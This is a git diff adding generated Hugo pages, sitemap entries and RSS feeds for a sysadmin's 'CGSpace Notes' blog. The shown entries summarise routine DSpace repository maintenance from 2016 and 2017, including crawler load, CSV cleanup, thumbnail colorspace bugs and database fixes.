https://alanorth.github.io/cgspace-notes/2022-09/ + 2022-09-30T17:29:50+03:00 + + https://alanorth.github.io/cgspace-notes/2022-08/ + 2023-02-22T11:59:48+03:00 + + https://alanorth.github.io/cgspace-notes/2022-07/ + 2022-07-31T15:49:35+03:00 + + https://alanorth.github.io/cgspace-notes/2022-06/ + 2023-04-27T13:10:13-07:00 + + https://alanorth.github.io/cgspace-notes/2022-05/ + 2022-05-30T16:00:02+03:00 + + https://alanorth.github.io/cgspace-notes/2022-04/ + 2022-05-04T11:09:45+03:00 + + https://alanorth.github.io/cgspace-notes/2022-03/ + 2022-06-09T09:41:49+03:00 + + https://alanorth.github.io/cgspace-notes/2022-02/ + 2022-03-01T17:17:27+03:00 + + https://alanorth.github.io/cgspace-notes/2022-01/ + 2022-05-12T12:51:45+03:00 + + https://alanorth.github.io/cgspace-notes/2021-12/ + 2022-01-09T10:39:51+02:00 + + https://alanorth.github.io/cgspace-notes/2021-11/ + 2021-11-30T16:44:30+02:00 + + https://alanorth.github.io/cgspace-notes/2021-10/ + 2021-11-01T10:48:13+02:00 + + https://alanorth.github.io/cgspace-notes/2021-09/ + 2021-10-04T11:10:54+03:00 + + https://alanorth.github.io/cgspace-notes/2021-08/ + 2021-09-02T17:06:28+03:00 + + https://alanorth.github.io/cgspace-notes/2021-07/ + 2021-08-01T16:19:05+03:00 + + https://alanorth.github.io/cgspace-notes/2021-06/ + 2021-07-01T08:53:21+03:00 + + https://alanorth.github.io/cgspace-notes/2021-05/ + 2021-07-06T17:03:55+03:00 + + https://alanorth.github.io/cgspace-notes/2021-04/ + 2021-04-28T18:57:48+03:00 + + https://alanorth.github.io/cgspace-notes/2021-03/ + 2021-04-13T21:13:08+03:00 + + https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/ + 2021-09-21T12:46:34+03:00 + + https://alanorth.github.io/cgspace-notes/tags/migration/ + 2021-09-21T12:46:34+03:00 + + https://alanorth.github.io/cgspace-notes/tags/ + 2021-09-21T12:46:34+03:00 + + https://alanorth.github.io/cgspace-notes/2021-02/ + 2021-08-08T17:07:54+03:00 + + 
https://alanorth.github.io/cgspace-notes/2021-01/ + 2021-01-31T16:32:16+02:00 + + https://alanorth.github.io/cgspace-notes/2020-12/ + 2021-01-04T20:09:02+02:00 + + https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/ + 2020-12-01T19:15:48+02:00 + + https://alanorth.github.io/cgspace-notes/2020-11/ + 2020-11-30T20:12:55+02:00 + + https://alanorth.github.io/cgspace-notes/2020-10/ + 2020-11-16T10:53:45+02:00 + + https://alanorth.github.io/cgspace-notes/2020-09/ + 2020-10-01T10:47:40+03:00 + + https://alanorth.github.io/cgspace-notes/2020-08/ + 2020-09-02T13:39:11+03:00 + + https://alanorth.github.io/cgspace-notes/2020-07/ + 2020-08-02T22:14:16+03:00 + + https://alanorth.github.io/cgspace-notes/2020-06/ + 2020-07-08T16:30:40+03:00 + + https://alanorth.github.io/cgspace-notes/2020-05/ + 2020-06-01T13:55:08+03:00 + + https://alanorth.github.io/cgspace-notes/2020-04/ + 2020-05-31T20:15:08+03:00 + + https://alanorth.github.io/cgspace-notes/2020-03/ + 2020-04-02T12:33:41+03:00 + + https://alanorth.github.io/cgspace-notes/2020-02/ + 2022-05-05T16:50:10+03:00 + + https://alanorth.github.io/cgspace-notes/2020-01/ + 2021-09-20T15:47:34+03:00 + + https://alanorth.github.io/cgspace-notes/2019-12/ + 2019-12-30T14:28:15+02:00 + + https://alanorth.github.io/cgspace-notes/2019-11/ + 2019-11-28T17:30:45+02:00 + + https://alanorth.github.io/cgspace-notes/2019-10/ + 2019-10-29T17:41:17+02:00 + + https://alanorth.github.io/cgspace-notes/2019-09/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2019-08/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2019-07/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2019-06/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2019-05/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2019-04/ + 2021-08-18T15:29:31+03:00 + + https://alanorth.github.io/cgspace-notes/2019-03/ + 2020-07-24T21:57:55+03:00 + + https://alanorth.github.io/cgspace-notes/2019-02/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2019-01/ + 2022-03-22T22:03:59+03:00 + + https://alanorth.github.io/cgspace-notes/2018-12/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2018-11/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2018-10/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2018-09/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2018-08/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2018-07/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2018-06/ + 2020-02-17T11:38:34+02:00 + + https://alanorth.github.io/cgspace-notes/2018-05/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2018-04/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2018-03/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2018-02/ + 2020-11-18T17:15:23+02:00 + + https://alanorth.github.io/cgspace-notes/2018-01/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-12/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-11/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/2017-10/ + 2019-10-28T13:39:25+02:00 + + https://alanorth.github.io/cgspace-notes/cgiar-library-migration/ + 2019-10-28T13:40:20+02:00 + + https://alanorth.github.io/cgspace-notes/tags/notes/ + 
2020-11-30T12:10:20+02:00 + + https://alanorth.github.io/cgspace-notes/2017-09/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-08/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-07/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-06/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-05/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-04/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-03/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-02/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2017-01/ + 2018-03-09T22:10:33+02:00 + + https://alanorth.github.io/cgspace-notes/2016-12/ + 2018-03-09T22:10:33+02:00 + + https://alanorth.github.io/cgspace-notes/2016-11/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2016-10/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2016-09/ + 2018-03-09T22:10:33+02:00 + + https://alanorth.github.io/cgspace-notes/2016-08/ + 2018-03-09T22:10:33+02:00 + + https://alanorth.github.io/cgspace-notes/2016-07/ + 2018-03-09T22:10:33+02:00 + + https://alanorth.github.io/cgspace-notes/2016-06/ + 2020-11-30T12:10:20+02:00 + + https://alanorth.github.io/cgspace-notes/2016-05/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2016-04/ + 2018-03-09T22:10:33+02:00 + + https://alanorth.github.io/cgspace-notes/2016-03/ + 2020-04-13T15:30:24+03:00 + + https://alanorth.github.io/cgspace-notes/2016-02/ + 2018-03-09T22:10:33+02:00 + + https://alanorth.github.io/cgspace-notes/2016-01/ + 2018-03-09T22:10:33+02:00 + + https://alanorth.github.io/cgspace-notes/2015-12/ + 2018-03-09T22:10:33+02:00 + + https://alanorth.github.io/cgspace-notes/2015-11/ + 2018-03-09T22:10:33+02:00 + + diff --git a/docs/tags/index.html b/docs/tags/index.html new file mode 100644 index 000000000..366ca9433 --- /dev/null +++ b/docs/tags/index.html @@ -0,0 +1,176 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/tags/index.xml b/docs/tags/index.xml new file mode 100644 index 000000000..1c087c02d --- /dev/null +++ b/docs/tags/index.xml @@ -0,0 +1,29 @@ + + + + Tags on CGSpace Notes + https://alanorth.github.io/cgspace-notes/tags/ + Recent content in Tags on CGSpace Notes + Hugo -- gohugo.io + en-us + Sun, 21 Feb 2021 13:27:35 +0200 + + Migration + https://alanorth.github.io/cgspace-notes/tags/migration/ + Sun, 21 Feb 2021 13:27:35 +0200 + + https://alanorth.github.io/cgspace-notes/tags/migration/ + + + + + Notes + https://alanorth.github.io/cgspace-notes/tags/notes/ + Thu, 07 Sep 2017 16:54:52 +0700 + + https://alanorth.github.io/cgspace-notes/tags/notes/ + + + + + diff --git a/docs/tags/migration/index.html b/docs/tags/migration/index.html new file mode 100644 index 000000000..9c2f5a97a --- /dev/null +++ b/docs/tags/migration/index.html @@ -0,0 +1,209 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + + + + + + + + + + + + + + +
+
+

CGIAR Library Migration

+ +
+

Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called CGIAR System Organization.

+ Read more → +
+ + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/tags/migration/index.xml b/docs/tags/migration/index.xml new file mode 100644 index 000000000..274fa247f --- /dev/null +++ b/docs/tags/migration/index.xml @@ -0,0 +1,39 @@ + + + + Migration on CGSpace Notes + https://alanorth.github.io/cgspace-notes/tags/migration/ + Recent content in Migration on CGSpace Notes + Hugo -- gohugo.io + en-us + Sun, 21 Feb 2021 13:27:35 +0200 + + CGSpace CG Core v2 Migration + https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/ + Sun, 21 Feb 2021 13:27:35 +0200 + + https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/ + <p>Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.</p> +<p>With reference to <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2 draft standard</a> by Marie-Angélique as well as <a href="http://www.dublincore.org/specifications/dublin-core/dcmi-terms/">DCMI DCTERMS</a>.</p> + + + + CGSpace DSpace 6 Upgrade + https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/ + Sun, 15 Nov 2020 13:27:35 +0200 + + https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/ + <p>Notes about the DSpace 6 upgrade on CGSpace in 2020-11.</p> + + + + CGIAR Library Migration + https://alanorth.github.io/cgspace-notes/cgiar-library-migration/ + Mon, 18 Sep 2017 16:38:35 +0300 + + https://alanorth.github.io/cgspace-notes/cgiar-library-migration/ + <p>Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called <em>CGIAR System Organization</em>.</p> + + + + diff --git a/docs/tags/migration/page/1/index.html b/docs/tags/migration/page/1/index.html new file mode 100644 index 000000000..91b4d8e69 --- /dev/null +++ b/docs/tags/migration/page/1/index.html @@ -0,0 +1,10 @@ + + + + https://alanorth.github.io/cgspace-notes/tags/migration/ + + + + + + diff --git a/docs/tags/notes/index.html b/docs/tags/notes/index.html new file mode 100644 index 000000000..0f7ffe64a --- /dev/null +++ b/docs/tags/notes/index.html @@ -0,0 +1,439 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

September, 2017

+ +
+

2017-09-06

+
    +
  • Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours
  • +
+

2017-09-07

+
    +
  • Ask Sisay to clean up the WLE approvers a bit, as Marianne’s user account is in both the approvers step and the group
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2017

+ +
+

2017-08-01

+
    +
  • Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours
  • +
  • I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)
  • +
  • The good thing is that, according to dspace.log.2017-08-01, they are all using the same Tomcat session
  • +
  • This means our Tomcat Crawler Session Valve is working
  • +
  • But many of the bots are browsing dynamic URLs like: +
      +
    • /handle/10568/3353/discover
    • +
    • /handle/10568/16510/browse
    • +
    +
  • +
  • The robots.txt only blocks the top-level /discover and /browse URLs… we will need to find a way to forbid them from accessing these!
  • +
  • Relevant issue from DSpace Jira (semi-resolved in DSpace 6.0): https://jira.duraspace.org/browse/DS-2962
  • +
  • It turns out that we’re already adding the X-Robots-Tag "none" HTTP header, but this only forbids the search engine from indexing the page, not crawling it!
  • +
  • Also, the bot has to successfully browse the page first so it can receive the HTTP header…
  • +
  • We might actually have to block these requests with HTTP 403 depending on the user agent (a rough nginx sketch follows after this list)
  • +
  • Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415
  • +
  • This was due to newline characters in the dc.description.abstract column, which caused OpenRefine to choke when exporting the CSV
  • +
  • I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
  • +
  • Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
  • +
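Going back to the crawler issue above: if we do end up blocking the dynamic Discovery and browse URLs outright, a rough nginx sketch (untested, and the bot list is only an example) could look like:

location ~ /handle/[0-9]+/[0-9]+/(discover|browse) {
    if ($http_user_agent ~* (Googlebot|Baiduspider|bingbot|Yahoo)) {
        return 403;
    }
    try_files $uri @tomcat;
}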
+ Read more → +
+ + + + + + +
+
+

July, 2017

+ +
+

2017-07-01

+
    +
  • Run system updates and reboot DSpace Test
  • +
+

2017-07-04

+
    +
  • Merge changes for WLE Phase II theme rename (#329)
  • +
  • Looking at extracting the metadata registries from ICARDA’s MEL DSpace database so we can compare fields with CGSpace
  • +
  • We can use PostgreSQL’s extended output format (-x) plus sed to format the output into quasi XML:
  • +
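The actual command is truncated in this summary, but the general idea is something like this (the database name, table, and regex here are illustrative):

$ psql -x -d mel -c 'select * from metadatafieldregistry;' | sed -E 's/^([a-z_]+) +\| (.*)$/<\1>\2<\/\1>/'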
+ Read more → +
+ + + + + + +
+
+

June, 2017

+ +
+ 2017-06-01: After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes. The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes. Then we’ll create a new sub-community for Phase II and create collections for the research themes there. The current “Research Themes” community will be renamed to “WLE Phase I Research Themes”. Tagged all items in the current Phase I collections with their appropriate themes. Create pull request to add Phase II research themes to the submission form: #328. Add cg. + Read more →
+ + + + + + +
+
+

May, 2017

+ +
+ 2017-05-01: ICARDA apparently started working on CG Core on their MEL repository. They have done a few cg.* fields, but not very consistently, and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02: Atmire got back about the Workflow Statistics issue, and apparently it’s a bug in the CUA module, so they will send us a pull request. 2017-05-04: Sync DSpace Test with database and assetstore from CGSpace. Re-deploy DSpace Test with Atmire’s CUA patch for workflow statistics, run system updates, and restart the server. Now I can see the workflow statistics and am able to select users, but everything returns 0 items. Megan says there are still some mapped items that are not appearing since last week, so I forced a full index-discovery -b. Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSpace Test) tomorrow: https://cgspace. + Read more →
+ + + + + + +
+
+

April, 2017

+ +
+

2017-04-02

+
    +
  • Merge one change to CCAFS flagships that I had forgotten to remove last month (“MANAGING CLIMATE RISK”): https://github.com/ilri/DSpace/pull/317
  • +
  • Quick proof-of-concept hack to add dc.rights to the input form, including some inline instructions/hints:
  • +
+

dc.rights in the submission form

+
    +
  • Remove redundant/duplicate text in the DSpace submission license
  • +
  • Testing the CMYK patch on a collection with 650 items:
  • +
+
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
+
+ Read more → +
+ + + + + + +
+
+

March, 2017

+ +
+

2017-03-01

+
    +
  • Run the 279 CIAT author corrections on CGSpace
  • +
+

2017-03-02

+
    +
  • Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace
  • +
  • CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles
  • +
  • They might come in at the top level in one “CGIAR System” community, or with several communities
  • +
  • I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?
  • +
  • Need to send Peter and Michael some notes about this in a few days
  • +
  • Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI
  • +
  • Filed an issue on DSpace issue tracker for the filter-media bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: DS-3516
  • +
  • Discovered that the ImageMagick filter-media plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK
  • +
  • Interestingly, it seems DSpace 4.x’s thumbnails were sRGB, but forcing regeneration using DSpace 5.x’s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see 10568/51999):
  • +
+
$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+
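For what it's worth, converting an affected thumbnail back to sRGB by hand is trivial, which could be handy for testing before touching filter-media (a sketch):

$ convert ~/Desktop/alc_contrastes_desafios.jpg -colorspace sRGB /tmp/alc_contrastes_desafios-srgb.jpg
$ identify -format '%[colorspace]\n' /tmp/alc_contrastes_desafios-srgb.jpg   # should now report sRGB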
+ Read more → +
+ + + + + + +
+
+

February, 2017

+ +
+

2017-02-07

+
    +
  • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
  • +
+
dspace=# select * from collection2item where item_id = '80278';
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+
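To see whether any other items have duplicate mappings lurking, a quick check against the same table (a sketch):

dspace=# select item_id, collection_id, count(*) from collection2item group by item_id, collection_id having count(*) > 1;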
    +
  • Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
  • +
  • Looks like we’ll be using cg.identifier.ccafsprojectpii as the field name
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2017

+ +
+

2017-01-02

+
    +
  • I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error
  • +
  • I tested on DSpace Test as well and it doesn’t work there either
  • +
  • I asked on the dspace-tech mailing list because it seems to be broken, and actually now I’m not sure if we’ve ever had the sharding task run successfully over all these years
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2016

+ +
+

2016-12-02

+
    +
  • CGSpace was down for five hours in the morning while I was sleeping
  • +
  • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
  • +
+
2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, ObjectType=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, ObjectType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+
    +
  • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
  • +
  • I’ve raised a ticket with Atmire to ask
  • +
  • Another worrying error from dspace.log is:
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/tags/notes/index.xml b/docs/tags/notes/index.xml new file mode 100644 index 000000000..7fcff9dae --- /dev/null +++ b/docs/tags/notes/index.xml @@ -0,0 +1,428 @@ + + + + Notes on CGSpace Notes + https://alanorth.github.io/cgspace-notes/tags/notes/ + Recent content in Notes on CGSpace Notes + Hugo -- gohugo.io + en-us + Thu, 07 Sep 2017 16:54:52 +0700 + + September, 2017 + https://alanorth.github.io/cgspace-notes/2017-09/ + Thu, 07 Sep 2017 16:54:52 +0700 + + https://alanorth.github.io/cgspace-notes/2017-09/ + <h2 id="2017-09-06">2017-09-06</h2> +<ul> +<li>Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours</li> +</ul> +<h2 id="2017-09-07">2017-09-07</h2> +<ul> +<li>Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group</li> +</ul> + + + + August, 2017 + https://alanorth.github.io/cgspace-notes/2017-08/ + Tue, 01 Aug 2017 11:51:52 +0300 + + https://alanorth.github.io/cgspace-notes/2017-08/ + <h2 id="2017-08-01">2017-08-01</h2> +<ul> +<li>Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours</li> +<li>I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)</li> +<li>The good thing is that, according to <code>dspace.log.2017-08-01</code>, they are all using the same Tomcat session</li> +<li>This means our Tomcat Crawler Session Valve is working</li> +<li>But many of the bots are browsing dynamic URLs like: +<ul> +<li>/handle/10568/3353/discover</li> +<li>/handle/10568/16510/browse</li> +</ul> +</li> +<li>The <code>robots.txt</code> only blocks the top-level <code>/discover</code> and <code>/browse</code> URLs&hellip; we will need to find a way to forbid them from accessing these!</li> +<li>Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): <a href="https://jira.duraspace.org/browse/DS-2962">https://jira.duraspace.org/browse/DS-2962</a></li> +<li>It turns out that we&rsquo;re already adding the <code>X-Robots-Tag &quot;none&quot;</code> HTTP header, but this only forbids the search engine from <em>indexing</em> the page, not crawling it!</li> +<li>Also, the bot has to successfully browse the page first so it can receive the HTTP header&hellip;</li> +<li>We might actually have to <em>block</em> these requests with HTTP 403 depending on the user agent</li> +<li>Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415</li> +<li>This was due to newline characters in the <code>dc.description.abstract</code> column, which caused OpenRefine to choke when exporting the CSV</li> +<li>I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using <code>g/^$/d</code></li> +<li>Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet</li> +</ul> + + + + July, 2017 + https://alanorth.github.io/cgspace-notes/2017-07/ + Sat, 01 Jul 2017 18:03:52 +0300 + + https://alanorth.github.io/cgspace-notes/2017-07/ + <h2 id="2017-07-01">2017-07-01</h2> +<ul> +<li>Run system updates and reboot DSpace Test</li> +</ul> +<h2 id="2017-07-04">2017-07-04</h2> +<ul> +<li>Merge changes for WLE Phase II theme rename (<a href="https://github.com/ilri/DSpace/pull/329">#329</a>)</li> +<li>Looking at extracting the metadata registries 
from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li> +<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li> +</ul> + + + + June, 2017 + https://alanorth.github.io/cgspace-notes/2017-06/ + Thu, 01 Jun 2017 10:14:52 +0300 + + https://alanorth.github.io/cgspace-notes/2017-06/ + 2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg. + + + + May, 2017 + https://alanorth.github.io/cgspace-notes/2017-05/ + Mon, 01 May 2017 16:21:52 +0200 + + https://alanorth.github.io/cgspace-notes/2017-05/ + 2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace. 
+ + + + April, 2017 + https://alanorth.github.io/cgspace-notes/2017-04/ + Sun, 02 Apr 2017 17:08:52 +0200 + + https://alanorth.github.io/cgspace-notes/2017-04/ + <h2 id="2017-04-02">2017-04-02</h2> +<ul> +<li>Merge one change to CCAFS flagships that I had forgotten to remove last month (&ldquo;MANAGING CLIMATE RISK&rdquo;): <a href="https://github.com/ilri/DSpace/pull/317">https://github.com/ilri/DSpace/pull/317</a></li> +<li>Quick proof-of-concept hack to add <code>dc.rights</code> to the input form, including some inline instructions/hints:</li> +</ul> +<p><img src="https://alanorth.github.io/cgspace-notes/cgspace-notes/2017/04/dc-rights.png" alt="dc.rights in the submission form"></p> +<ul> +<li>Remove redundant/duplicate text in the DSpace submission license</li> +<li>Testing the CMYK patch on a collection with 650 items:</li> +</ul> +<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt +</code></pre> + + + + March, 2017 + https://alanorth.github.io/cgspace-notes/2017-03/ + Wed, 01 Mar 2017 17:08:52 +0200 + + https://alanorth.github.io/cgspace-notes/2017-03/ + <h2 id="2017-03-01">2017-03-01</h2> +<ul> +<li>Run the 279 CIAT author corrections on CGSpace</li> +</ul> +<h2 id="2017-03-02">2017-03-02</h2> +<ul> +<li>Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace</li> +<li>CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles</li> +<li>They might come in at the top level in one &ldquo;CGIAR System&rdquo; community, or with several communities</li> +<li>I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?</li> +<li>Need to send Peter and Michael some notes about this in a few days</li> +<li>Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI</li> +<li>Filed an issue on DSpace issue tracker for the <code>filter-media</code> bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: <a href="https://jira.duraspace.org/browse/DS-3516">DS-3516</a></li> +<li>Discovered that the ImageMagic <code>filter-media</code> plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK</li> +<li>Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see <a href="https://cgspace.cgiar.org/handle/10568/51999">10568/51999</a>):</li> +</ul> +<pre tabindex="0"><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg +/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000 +</code></pre> + + + + February, 2017 + 